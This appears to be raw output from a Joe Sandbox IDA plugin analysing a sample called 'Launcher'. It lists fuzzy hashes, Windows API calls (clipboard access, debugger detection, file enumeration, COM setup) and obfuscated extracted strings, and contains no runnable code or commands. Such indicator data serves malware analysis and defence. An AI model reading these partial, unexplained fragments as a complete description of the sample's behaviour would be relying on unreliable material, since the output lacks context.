                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 3376c5780ff4783cba57ca5b2ed756fdeca83758466a62a9a568b40f5c76f192
                                                                        • Instruction ID: e32dd57dfee8a6373bd6d9c6ffa489eeaa640e30f2edf390baa49a0d4f32e9e2
                                                                        • Opcode Fuzzy Hash: 3376c5780ff4783cba57ca5b2ed756fdeca83758466a62a9a568b40f5c76f192
                                                                        • Instruction Fuzzy Hash: 946107B4D002404FE704DF68C955BAEBBB1BB45304F1941ACD8886B385D778C846CBE6
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 151a0b0d1d0d1be4cc1d159a629a451b5c7fe46777ba24f86f3b905103d69d3c
                                                                        • Instruction ID: 684847568e63329ad74cab9d0d2d3044732733c62a1d1e84330838568e632740
                                                                        • Opcode Fuzzy Hash: 151a0b0d1d0d1be4cc1d159a629a451b5c7fe46777ba24f86f3b905103d69d3c
                                                                        • Instruction Fuzzy Hash: 021106356942449BEF048FA4DD967EE7FB2EF5A304F2440ADC041B7392D6398D458B5C
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1d5f4ec3c9038722f1d4064c3d749de1a29aeeec8a9c3730a1ed6e76fe59fcc5
                                                                        • Instruction ID: 6223a200e89733de9b39cbb2e55d4e3386871cbfeb0ebab32caeb2a371115a50
                                                                        • Opcode Fuzzy Hash: 1d5f4ec3c9038722f1d4064c3d749de1a29aeeec8a9c3730a1ed6e76fe59fcc5
                                                                        • Instruction Fuzzy Hash: 63F039756183049FE7449F21EC847AAB3F5EB86305F41982CF99193261EB70D809DA0A
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(?,00000000,?), ref: 0043B0F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID:
                                                                        • API String ID: 3298025750-0
                                                                        • Opcode ID: 067062678a84efdd0e7db51d0cfa6fe89f7adf20a88878a0838a84ed2eadcfe8
                                                                        • Instruction ID: 0e8247adfe53c3d58792063fc2aa977bfa5c3ef0f2d592079fb2eb92c1b7fc94
                                                                        • Opcode Fuzzy Hash: 067062678a84efdd0e7db51d0cfa6fe89f7adf20a88878a0838a84ed2eadcfe8
                                                                        • Instruction Fuzzy Hash: 68014472A243508FC7089B64ECA5B2B7BA5EFC6305F0A403DDA81876A0E7B45810D7D6
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: BlanketProxy
                                                                        • String ID:
                                                                        • API String ID: 3890896728-0
                                                                        • Opcode ID: 08dafdfdfe9a7c9b6191068d195533e3b66fd54997fee8b243fdf1bbc06b4a11
                                                                        • Instruction ID: 132b52fd7802fe4bfc6d3a7148e392146a2953d2c6d09b9c10ac09a149df5120
                                                                        • Opcode Fuzzy Hash: 08dafdfdfe9a7c9b6191068d195533e3b66fd54997fee8b243fdf1bbc06b4a11
                                                                        • Instruction Fuzzy Hash: 7EF0A9B45057018FD344DF28C5A871ABBE0AB89704F10481CE0958B3A0DB759548CF81
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?,?,0041197E), ref: 0043B060
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: c68143cb518e74a69266f4930f3d8b431186b7bd823fea2b57977c23afd500a3
                                                                        • Instruction ID: 4c64f78faed6f1d0fb51450777116b3bddbd2d2e4b33a2b21e8f3e9e9918578c
                                                                        • Opcode Fuzzy Hash: c68143cb518e74a69266f4930f3d8b431186b7bd823fea2b57977c23afd500a3
                                                                        • Instruction Fuzzy Hash: FEE048341087405BD7495B2498A1A6B7B61DB9A720F20156DE0D2936F1C7269817DE45
                                                                        APIs
                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0040D273
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: Initialize
                                                                        • String ID:
                                                                        • API String ID: 2538663250-0
                                                                        • Opcode ID: 5b077bfe4455e23a3c674899ef49d65f04014d2006343274f3f84038a774a7f6
                                                                        • Instruction ID: f853df7a29e590a315f10d920dec143745f9287da6b926524a5840ccd99faa2d
                                                                        • Opcode Fuzzy Hash: 5b077bfe4455e23a3c674899ef49d65f04014d2006343274f3f84038a774a7f6
                                                                        • Instruction Fuzzy Hash: 73D05E745901446BD200AB28AC06F2236688343B25F444235B6A2C61D7E9116914C56A
                                                                        APIs
                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040D2A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeSecurity
                                                                        • String ID:
                                                                        • API String ID: 640775948-0
                                                                        • Opcode ID: 94ae0bf42bc59fadde0ff639082cce8abde593e835750ad71f1e7d69a4288824
                                                                        • Instruction ID: 2d7b7a70427f1330292365c5a8f411c4952d63840b4a80755c1cfceed43a82c1
                                                                        • Opcode Fuzzy Hash: 94ae0bf42bc59fadde0ff639082cce8abde593e835750ad71f1e7d69a4288824
                                                                        • Instruction Fuzzy Hash: 02D0C9743D438176F2748B0CAC53F5436546307F12F300224B322FE2D0CAE071058A1D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: " $"B$2- ($7654$SQ$W@$\2$n9m;$r1`3$u5`7$}s$}s
                                                                        • API String ID: 0-327531642
                                                                        • Opcode ID: 4763f4544488dc213c48f2e26bd059baeeca52c6088159a995f66b0bddd8cd24
                                                                        • Instruction ID: 1ec7e797cd9eb8f4d7ad4eff3564fad9b8d8c7c05487f80a661f34697a0983b7
                                                                        • Opcode Fuzzy Hash: 4763f4544488dc213c48f2e26bd059baeeca52c6088159a995f66b0bddd8cd24
                                                                        • Instruction Fuzzy Hash: 8492FDB5A00B16DFDB14CF25D8806AABBB2FF45300F56855DC499AF761DB34A852CF80
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: w1u$$W U$+[&Y$1UVW$=O?M$X+\)$bkB$c/g-$cS'Q$
                                                                        • API String ID: 0-1107640020
                                                                        • Opcode ID: d094553142b8fa0c3f843ef86b2216bf43cee4b104b0197a05f46ab8b87a6c2c
                                                                        • Instruction ID: 07adb09d38e0d3280f8d28688e1147cd8a6c36b3ce6469b78c24922fb3c68d64
                                                                        • Opcode Fuzzy Hash: d094553142b8fa0c3f843ef86b2216bf43cee4b104b0197a05f46ab8b87a6c2c
                                                                        • Instruction Fuzzy Hash: 8BD1E0B8608380DFE7209F25E88176BBBB1FBC2304F51496DF5854B261E7759806CB86
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$CloseDataLongOpenWindow
                                                                        • String ID:
                                                                        • API String ID: 1647500905-0
                                                                        • Opcode ID: ce365d0da545476f18f4140f590a68767b83894f9fd16f6a09fcb78067349483
                                                                        • Instruction ID: 17803934bde16856924c357768b87d9616dc2f9b743b2c2e0f5da409e4691948
                                                                        • Opcode Fuzzy Hash: ce365d0da545476f18f4140f590a68767b83894f9fd16f6a09fcb78067349483
                                                                        • Instruction Fuzzy Hash: 4451F1B1808781DFD710AF78D54A39EBFA0AB15305F04863EE4858B782E37D9658C797
                                                                        APIs
                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 002518EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: FileFindFirst
                                                                        • String ID:
                                                                        • API String ID: 1974802433-0
                                                                        • Opcode ID: 670051000669fc4198a07e9bf53609553f89f69f0a362f41d0af52424e242d28
                                                                        • Instruction ID: c40b5f560212bb7bd7010885ca26cbfb4d214dfd9636da22f34b1dd16e6ed254
                                                                        • Opcode Fuzzy Hash: 670051000669fc4198a07e9bf53609553f89f69f0a362f41d0af52424e242d28
                                                                        • Instruction Fuzzy Hash: 62710671C251196FDF35EF289C9DBBEB7B9EB05301F1441D9E809A3251DA304EA98F18
                                                                        APIs
                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0024A470
                                                                        • IsDebuggerPresent.KERNEL32 ref: 0024A53C
                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0024A55C
                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 0024A566
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300473417.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                                                        • Associated: 00000003.00000002.2300448136.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300510676.0000000000258000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300534969.0000000000260000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300562910.0000000000264000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000003.00000002.2300596949.0000000000266000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_230000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                        • String ID:
                                                                        • API String ID: 254469556-0
                                                                        • Opcode ID: 20e554be1242da84a61cd2f3d2ff7f650d8df348eccee455c87938cf683a868b
                                                                        • Instruction ID: f46bbd9d1c0f0a304e69c9574235cde4cbd619251a9ddaafb9efd45d3900f620
                                                                        • Opcode Fuzzy Hash: 20e554be1242da84a61cd2f3d2ff7f650d8df348eccee455c87938cf683a868b
                                                                        • Instruction Fuzzy Hash: 52310775D553189BDF21EFA4D9897CDBBB8AF08304F1040AAE40CAB250EB719B85CF45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID: 7654$7654$K7$`b]}
                                                                        • API String ID: 2994545307-3105809555
                                                                        • Opcode ID: 9802f542914dd4b860a900ac3f1736758820710e1b073b33d4eb07b853cfbc3e
                                                                        • Instruction ID: 64c6081f0a2204a6899387c6940b517753b686c6832b0442df47da2492da9ce9
                                                                        • Opcode Fuzzy Hash: 9802f542914dd4b860a900ac3f1736758820710e1b073b33d4eb07b853cfbc3e
                                                                        • Instruction Fuzzy Hash: C3223475A093409BD714CF28D890BABB792EF96304F19856ED0C687362D774DC86CB8B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .zH$4;$HzH$|}
                                                                        • API String ID: 0-2754067922
                                                                        • Opcode ID: 16c00d66ed237cb7ac5fd89160097f63f69d048809e64baff63aaf6f17e4c28a
                                                                        • Instruction ID: 4c80123772d873f3d2cee772b4d38be2c1a2a5879bcda46720ca7d40980cb5f3
                                                                        • Opcode Fuzzy Hash: 16c00d66ed237cb7ac5fd89160097f63f69d048809e64baff63aaf6f17e4c28a
                                                                        • Instruction Fuzzy Hash: 511286B4D00205CBCB14CF69C8916EFBBB1FF46324F18852DE8956B385E338A946CB95
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .y7/$`o$cb`d$gzyi
                                                                        • API String ID: 0-1486537593
                                                                        • Opcode ID: f4fd3634d7af85613517cb621c8590516dddc43ecd63ca63492b3f332954c7e4
                                                                        • Instruction ID: 73ee5e978b3ae7903bd64636a7987c208e490655bfc664e26e61893c9cb750fe
                                                                        • Opcode Fuzzy Hash: f4fd3634d7af85613517cb621c8590516dddc43ecd63ca63492b3f332954c7e4
                                                                        • Instruction Fuzzy Hash: 141247B5A0C3518BD714CF25E85126BBBE1EFD6304F08896EE4C59B341D738D90ACB9A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Lz$`{$uy$~I
                                                                        • API String ID: 0-1638023654
                                                                        • Opcode ID: 4939bdcd720d2d8cadce823c6c50284a5e7931ace41ba08f26985008098efa05
                                                                        • Instruction ID: 342cf044e97a58d3db7132360508a74081fc9fafca0238ac93fdbfb74b7ec0f7
                                                                        • Opcode Fuzzy Hash: 4939bdcd720d2d8cadce823c6c50284a5e7931ace41ba08f26985008098efa05
                                                                        • Instruction Fuzzy Hash: 02E1FDB16083209BC714CF14D86136BBBE1EFD5714F08891DE8C69B3A1E779C905CB8A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: _z5@$_z5@$qz5@$qz5@
                                                                        • API String ID: 0-1441355546
                                                                        • Opcode ID: ac0fb15dc88d696ed3d50c071f0ac3644f2aab8c5deaa3ad17473f714e21756e
                                                                        • Instruction ID: 1cb89060f304c113218be3815143164a3d7a474535087d2138f222ec7f76e972
                                                                        • Opcode Fuzzy Hash: ac0fb15dc88d696ed3d50c071f0ac3644f2aab8c5deaa3ad17473f714e21756e
                                                                        • Instruction Fuzzy Hash: FF41E1715083208BCB149F14E81063BB7F1FFA6345F54991DE8D65B3A4E7398910C78B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: E"WX$S#r^$Z,ST$[-I3
                                                                        • API String ID: 0-2576035952
                                                                        • Opcode ID: 13f34c4f50a1a07fab51708d4b918bbe42c87a8ccd365ccb80dfaec5ebea47d5
                                                                        • Instruction ID: 5a39df12ac70cea910d9df69709fed57744f71d54cded374284f8fdc3c439ac4
                                                                        • Opcode Fuzzy Hash: 13f34c4f50a1a07fab51708d4b918bbe42c87a8ccd365ccb80dfaec5ebea47d5
                                                                        • Instruction Fuzzy Hash: 3F3124B0514B908BC7658F3982603A3BBE1BF86314F58699DC4E387B92C739F442CB04
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: HF$IE$ZM
                                                                        • API String ID: 0-58942596
                                                                        • Opcode ID: 7e84ae3a88c0c4df319599b0c6c06f440f3123c486e635d0d3d9c278290470a8
                                                                        • Instruction ID: 4d70116105068fe0a1585b5fee28dcb06b75358869d2f7aee483e1b39d9b0351
                                                                        • Opcode Fuzzy Hash: 7e84ae3a88c0c4df319599b0c6c06f440f3123c486e635d0d3d9c278290470a8
                                                                        • Instruction Fuzzy Hash: 3DC112B06083108BD724CF25D95176BB7F1FFA2350F488A5DE4D28B3A4E7B99904CB96
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: F@VI$Nxnq$cp
                                                                        • API String ID: 0-4002531926
                                                                        • Opcode ID: 24dfb663d71b8e09813bf0f5456dca11cc10d3d639255235cb3a0c78bdf79dfb
                                                                        • Instruction ID: 8a29cccb321ec278c30b7ffc1d55adb7a6b13275fc88ca724196cb343f14b233
                                                                        • Opcode Fuzzy Hash: 24dfb663d71b8e09813bf0f5456dca11cc10d3d639255235cb3a0c78bdf79dfb
                                                                        • Instruction Fuzzy Hash: 758113B59083918FD314CF24D84166FBBE2AF85304F18896EE8D687392E679D845CB87
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2J@$BK@$I@
                                                                        • API String ID: 0-187361804
                                                                        • Opcode ID: f6f0e5eb5162b6aaf46d31c3b152c7532c3223376071486b5f055edd2ef6a495
                                                                        • Instruction ID: f7c6d29b76e65a0d0bf1f6299292556ecd118515f81c415ee8970d329b3b0465
                                                                        • Opcode Fuzzy Hash: f6f0e5eb5162b6aaf46d31c3b152c7532c3223376071486b5f055edd2ef6a495
                                                                        • Instruction Fuzzy Hash: B571AC79609602CFDB08CF24E4A03AA77F1FB8A346F05807DE8858B292D775D985DF85
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: cb`d$gzyi
                                                                        • API String ID: 0-146784027
                                                                        • Opcode ID: bec2e082f871bcbef0e6bbc3144a8f27d38fbbb0c4eb39aaa73caa54c4155fae
                                                                        • Instruction ID: 589721233e1184f7b93af10d955cab5016d861bdc776373f3e67ebdef895139e
                                                                        • Opcode Fuzzy Hash: bec2e082f871bcbef0e6bbc3144a8f27d38fbbb0c4eb39aaa73caa54c4155fae
                                                                        • Instruction Fuzzy Hash: 67F118B560C3518BC714DF25E89126BB7E1EF96304F08887EE4C597342E739D909CB5A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 40F3$z\B
                                                                        • API String ID: 0-426307818
                                                                        • Opcode ID: 45f379b2dae90aea72c51e9e702bd7fff7091b14a155fa3f666690b9af15ba42
                                                                        • Instruction ID: 498da2e28091b230820d302b17542d13e6b523f95bed6f1ccb4e6a02f20431bc
                                                                        • Opcode Fuzzy Hash: 45f379b2dae90aea72c51e9e702bd7fff7091b14a155fa3f666690b9af15ba42
                                                                        • Instruction Fuzzy Hash: 52A10671604B818FE329CB39D4A17A7BBD1AF53304F58885EC0EB8B392D7796405CB65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 40F3$z\B
                                                                        • API String ID: 0-426307818
                                                                        • Opcode ID: 894d52e7406151b6594a9adfcf0dd35d61f7e320749617ee7a9955ca99d959aa
                                                                        • Instruction ID: 034a7008790bf69728bdf75bd2974393d91308eb0864f51b0121dd2d4574678b
                                                                        • Opcode Fuzzy Hash: 894d52e7406151b6594a9adfcf0dd35d61f7e320749617ee7a9955ca99d959aa
                                                                        • Instruction Fuzzy Hash: E5A10570604B818FE329CB39D4A17A7BBD2AF53304F58845EC0EB8B392D7796006CB65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 40F3$z\B
                                                                        • API String ID: 0-426307818
                                                                        • Opcode ID: 29e53cf9b020ad464fdf824bbb6578da22d00ff9ce7fb0d1a3217d04609603cf
                                                                        • Instruction ID: bee1a0546301b459e96431053b5b94568506ebc424ead06ad1a0df34fef16323
                                                                        • Opcode Fuzzy Hash: 29e53cf9b020ad464fdf824bbb6578da22d00ff9ce7fb0d1a3217d04609603cf
                                                                        • Instruction Fuzzy Hash: 92A1F571604B818FE329CB39D4A17A7BBD2AF53304F58845EC0EB8B392D7796406CB65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 40F3$z\B
                                                                        • API String ID: 0-426307818
                                                                        • Opcode ID: 92d84887212e068ebb43c38c83c2115f7bf3f104c6853f619a4717065197e9db
                                                                        • Instruction ID: 53d5a600ad2fb64aa9eefa9411e692cf7a0f670bbf2d035d9d804fd55e83da83
                                                                        • Opcode Fuzzy Hash: 92d84887212e068ebb43c38c83c2115f7bf3f104c6853f619a4717065197e9db
                                                                        • Instruction Fuzzy Hash: 2D91D671604B808FE325CB35D4A17B7BBD2AF53304F58845EC0EB8B692D7796406CB65
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Y`Pb$yVh]
                                                                        • API String ID: 0-2084830440
                                                                        • Opcode ID: f52b21de84ce6a21add13dfa8e557a0538738c7fbc7296b4cc640362d4c6293c
                                                                        • Instruction ID: f722a9b3a85af15d1d0177742b6600c000020fd4e026f340dbf6347df914f1d4
                                                                        • Opcode Fuzzy Hash: f52b21de84ce6a21add13dfa8e557a0538738c7fbc7296b4cc640362d4c6293c
                                                                        • Instruction Fuzzy Hash: 64517C317483628BD7248E24A9A12B7FB90EF42350F99476EDA91477C2D33DD849D3CA
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(00443598,00000000,00000001,00443588), ref: 00423219
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID: CreateInstance
                                                                        • String ID:
                                                                        • API String ID: 542301482-0
                                                                        • Opcode ID: 3bab1d380f97032a9f315e65e3d7766baebf32abcf04ab904765ecd122f1eb22
                                                                        • Instruction ID: 71ce44aec7d3b8c1f5f9fb612631e1477a0120926aca0f6bb1b722cf7af0fba3
                                                                        • Opcode Fuzzy Hash: 3bab1d380f97032a9f315e65e3d7766baebf32abcf04ab904765ecd122f1eb22
                                                                        • Instruction Fuzzy Hash: 7951CCB0700320ABDB20DF24DC86B6733B4EF8576AF444559E9858B390E77DEA05C72A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2553554435
                                                                        • Opcode ID: 2140aaf378637c4364fd0247320baf6ac4bb0000a29956785586fa384e716162
                                                                        • Instruction ID: f49577d193c8abb6453e9474ca47d3b4d1bfe81202629265be6873369bba8e08
                                                                        • Opcode Fuzzy Hash: 2140aaf378637c4364fd0247320baf6ac4bb0000a29956785586fa384e716162
                                                                        • Instruction Fuzzy Hash: 3DC167B6A043209BC724DF24D85162BB3F1EFD5314F59852EE8C697381E77CD9058396
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_Launcher.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: "
                                                                        • API String ID: 0-123907689
                                                                        • Opcode ID: 67a9909f13c84bda9c902c05a983fdda779d17265ce718b46d8b7cf5fc1650fc
                                                                        • Instruction ID: b8070625620b0bc9f221c6e9060029e60e68ddcd4ffb9493ab494252952fbdc1
                                                                        • Opcode Fuzzy Hash: 67a9909f13c84bda9c902c05a983fdda779d17265ce718b46d8b7cf5fc1650fc
                                                                        • Instruction Fuzzy Hash: ABD12571B083299FC714CE25E48176BB7E5EF84314F48896EE99987382DB78DC0587C6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.2300644517.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
